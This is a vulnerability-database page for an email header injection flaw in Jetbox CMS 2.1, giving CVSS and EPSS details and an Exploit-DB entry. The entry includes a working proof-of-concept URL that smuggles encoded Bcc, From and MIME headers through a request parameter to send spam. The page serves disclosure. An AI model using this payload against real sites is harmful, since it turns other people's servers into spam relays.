Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5.8 |
|
AV:N/AC:M/Au:N/C:P/I:P/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 30040
Publication date : 2007-05-14 22h00 +00:00
Author : Jesper Jurcenoks
EDB Verified : Yes
source: https://www.securityfocus.com/bid/23989/info
Jetbox CMS is prone to an input-validation vulnerabilitiy because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to send spam email in the context of the application.
Jetbox 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/[JETBOX-DIRECTORY
[email protected]&_SETTINGS[allowed_email_hosts][]=somedomain.com&subject=Some Spam Subject%0ABcc:
[email protected],
[email protected],
[email protected],
[email protected]%0AFrom:
[email protected]%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A-- Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide
Products Mentioned
Configuraton 0
Apple>>Mac_os_x >> Version *
Hp>>Hp-ux >> Version *
Hp>>Tru64 >> Version *
Linux>>Linux_kernel >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_95 >> Version *
Microsoft>>Windows_98 >> Version *
Microsoft>>Windows_98se >> Version *
Microsoft>>Windows_me >> Version *
Microsoft>>Windows_nt >> Version 4.0
Microsoft>>Windows_xp >> Version *
Santa_cruz_operation>>Sco_unix >> Version *
Sun>>Solaris >> Version *
Windriver>>Bsdos >> Version *
Jetbox>>Jetbox_cms >> Version 2.1
References